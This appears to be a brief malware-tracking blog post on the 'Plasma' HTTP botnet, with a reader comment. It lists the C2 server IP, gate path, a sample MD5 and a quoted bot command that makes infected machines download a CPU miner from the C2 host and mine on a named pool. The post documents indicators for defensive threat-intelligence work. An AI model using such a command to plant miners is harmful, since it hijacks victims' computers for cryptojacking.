Resolved illuminati.sx to 109.236.80.74
Server: illuminati.sx
Gate file: /http/gate.php
This is the first time I have seen the HTTP version of plasma and it sucks hard. It seems to be a slightly upgraded version of the old barracuda HTTP bot, with few of the problems fixed.
Hosting info: http://whois.domaintools.com/109.236.80.74
Bitcoin mining info:
miner.start http://109.236.80.74/miner/CPUMiner.files *-a scrypt -o stratum+tcp://pool.d2.cc:3335 -O avaster.x:x -t THREADS*
Bonus: hxxp://109.236.80.74/miner/Miner.txt
Related md5s (Download sample from Malwr.com)
Plasmabot: a58ca1310ecdbc1a4f2faaad2751b489
Anonymous - February 16, 2014 at 5:45 pm
Goddamnit, Just dont track this bot back to the Hack Forums…Jesus Christ, these people deserve to go to jail…person IQ who host miner info or any other info in plain text is equal to the IQ of a little smarter fish!